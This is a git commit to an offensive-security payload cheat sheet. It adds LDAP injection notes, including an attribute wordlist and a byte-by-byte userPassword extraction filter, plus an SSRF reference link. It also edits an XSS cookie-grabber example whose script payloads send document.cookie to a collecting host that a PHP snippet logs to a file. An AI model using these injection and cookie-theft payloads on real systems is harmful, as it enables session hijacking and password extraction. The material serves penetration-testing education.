LDAP userPassword attribute

This commit is contained in:
Swissky 2018-10-31 22:34:10 +01:00
parent add00c7357
commit 4b7fe437a5
4 changed files with 43 additions and 1 deletions

View File

@ -0,0 +1,9 @@
userPassword
surname
name
cn
sn
objectClass
mail
givenName
commonName

View File

@ -66,7 +66,37 @@ We can extract using a bypass login
(&(sn=administrator)(password=MYKE)) : OK
```
## Defaults attributes
Can be used in an injection like `*)(ATTRIBUTE_HERE=*`
```bash
userPassword
surname
name
cn
sn
objectClass
mail
givenName
commonName
```
## Exploiting userPassword attribute
userPassword attribute in not a string like the cn attribute for example but its an OCTET STRING
In LDAP, every object, type, operator etc. is referenced by an OID : octetStringOrderingMatch (OID 2.5.13.18).
> octetStringOrderingMatch (OID 2.5.13.18): An ordering matching rule that will perform a bit-by-bit comparison (in big endian ordering) of two octet string values until a difference is found. The first case in which a zero bit is found in one value but a one bit is found in another will cause the value with the zero bit to be considered less than the value with the one bit.
```bash
userPassword:2.5.13.18:=\xx (\xx is a byte)
userPassword:2.5.13.18:=\xx\xx
userPassword:2.5.13.18:=\xx\xx\xx
```
## Thanks to
* [OWASP LDAP Injection](https://www.owasp.org/index.php/LDAP_injection)
* [LDAP Blind Explorer](http://code.google.com/p/ldap-blind-explorer/)
* [ECW 2018 : Write Up - AdmYSsion (WEB - 50) - 0xUKN](https://0xukn.fr/posts/WriteUpECW2018AdmYSsion/)

View File

@ -464,3 +464,4 @@ More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-se
* [PHP SSRF @secjuice](https://medium.com/secjuice/php-ssrf-techniques-9d422cb28d51)
* [How I convert SSRF to xss in a ssrf vulnerable Jira](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158)
* [Piercing the Veil: Server Side Request Forgery to NIPRNet access](https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-c358fd5e249a)
* [Hacker101 SSRF](https://www.youtube.com/watch?v=66ni2BTIjS8)

View File

@ -19,7 +19,9 @@ Cookie grabber for XSS
```php
<?php
// How to use it
# <script>document.location='http://localhost/XSS/grabber.php?c=' + document.cookie</script>
<script>document.location='http://localhost/XSS/grabber.php?c='+document.cookie</script>
or
<script>new Image().src="http://localhost/cookie.php?c="+document.cookie;</script>
// Write the cookie in a file
$cookie = $_GET['c'];